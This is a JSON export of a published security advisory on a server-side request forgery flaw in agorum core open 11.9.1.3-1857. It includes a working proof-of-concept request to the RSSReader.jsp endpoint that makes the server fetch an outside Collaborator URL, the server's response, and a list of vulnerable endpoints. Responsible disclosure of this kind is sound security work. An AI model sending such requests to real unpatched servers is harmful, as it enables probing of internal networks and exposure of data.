{"id":24249,"date":"2025-06-27T16:08:11","date_gmt":"2025-06-27T14:08:11","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0025\/"},"modified":"2025-07-01T10:24:58","modified_gmt":"2025-07-01T08:24:58","slug":"usd-2025-0025","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0025\/","title":{"rendered":"usd-2025-0025"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0025 | Agorum core open 11.9.1.3-1857 - Server-Side Request Forgery (SSRF)<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Server-Side Request Forgery (SSRF) (CWE-918)<br \/><strong>Security Risk<\/strong>: High<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Requested<br \/><strong>CVE Link<\/strong>: Requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0025<\/p>\n<h3>Description<\/h3>\n<p><!-- add a description of the application and vulnerability -->agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->Several endpoints in the application are vulnerable to Server-Side Request Forgery (SSRF). This allows attackers to craft requests that cause the server to initiate connections to arbitrary internal or external resources, potentially exposing sensitive information or enabling further attacks.<\/p>\n<p>The following request demonstrates the SSRF vulnerability. When submitted, the server makes a request to the specified URL:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp?reloadTime=600000);}&amp;feed=[http:\/\/etbjk99mmtvsce0wjfkmjof3zu5ntdh2.burp.usd.de\/ssrf]()<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p>In the response, it is evident that the server has fetched content from the target resource, confirming the SSRF behavior:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">text\/html;charset=ISO-8859-1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1422<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Fri, 02 May 2025 07:48:55 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<br \/><\/span>    <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">body<\/span> <span class=\"na\" style=\"background: #263238;color: #bb80b3\">onload<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"initReload()\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>        <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">div<\/span> <span class=\"na\" style=\"background: #263238;color: #bb80b3\">class<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"tableblock\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>        <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">table<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>            <span class=\"cm\" style=\"background: #263238;color: #546e7a;font-style: italic\">&lt;!-- &lt;html&gt;&lt;body&gt;xjiz55z1r9egabbtzruo7czjlgigz&lt;\/body&gt;&lt;\/html&gt;--&gt;<br \/><\/span>            <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">th<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span>null<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">th<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>        <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">table<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>        <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">div<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>    <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">body<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<br \/><\/span>[...]<\/pre>\n<\/div>\n<p>To further demonstrate the server's outbound request capabilities, a payload was sent to a Burp Collaborator URL. The interaction received confirms the SSRF vulnerability and shows that the server can establish external network connections:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/ssrf.png\" width=\"681\" height=\"516\" alt=\"\" class=\"wp-image-24086 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/ssrf.png 681w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/ssrf-480x364.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 681px, 100vw\" \/><\/p>\n<p>The vulnerability is present in multiple locations. The following is a non-exhaustive list of affected endpoints:<\/p>\n<ul>\n<li><strong>\/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp<\/strong><\/li>\n<li><strong>\/roiwebui\/TunnelServlet?tunnelAddress=127.0.0.1&amp;tunnelPort=1234<\/strong><\/li>\n<\/ul>\n<h3>Fix<\/h3>\n<p><!-- how the vendor can fix the vulnerability.--><br \/><!-- if you recommended a quick workaround to the customer (and they are fine with you including it here!) feel free to add this information as well -->It is recommended to evaluate whether making server-side requests is necessary for the functionality of the application.<br \/>Should this is the case, the security measures to be implemented depend on the type of server-side requests:<br \/>If the application only needs to be able to make requests to a precisely defined set of systems, these can be included in an allowlist.<br \/>On the other hand, if the application should be able to make requests to arbitrary external resources via the Internet, an allowlist cannot be used, as for this purpose it is not possible to define a set of permitted systems in advance.<br \/>Instead, a ruleset describing disallowed requests, a denylist, should be defined to reflect the expected format of legitimate requests.<\/p>\n<p>&nbsp;<\/p>\n<p>Users of agorum core open can upgrade to versions 11.9.2 and 11.10.1.<\/p>\n<h3>References<\/h3>\n<p><!-- add references to the application and vulnerability.--><\/p>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/918.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/918.html<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via mail.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor has confirmed the delivery and has begun investigating the matter.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor has begun addressing and fixing the issue.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-27<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><!-- add the names of the persons that discovered the vulnerability. This information will be sent to the vendor and published on the HeroLab blog -->This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0025 | Agorum core open 11.9.1.3-1857 - Server-Side Request Forgery (SSRF) Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Server-Side Request Forgery (SSRF) (CWE-918)Security Risk: HighVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: RequestedCVE Link: RequestedAdvisory ID: usd-2025-0025 Description agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24249","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24249","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24249"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24249\/revisions"}],"predecessor-version":[{"id":24257,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24249\/revisions\/24257"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}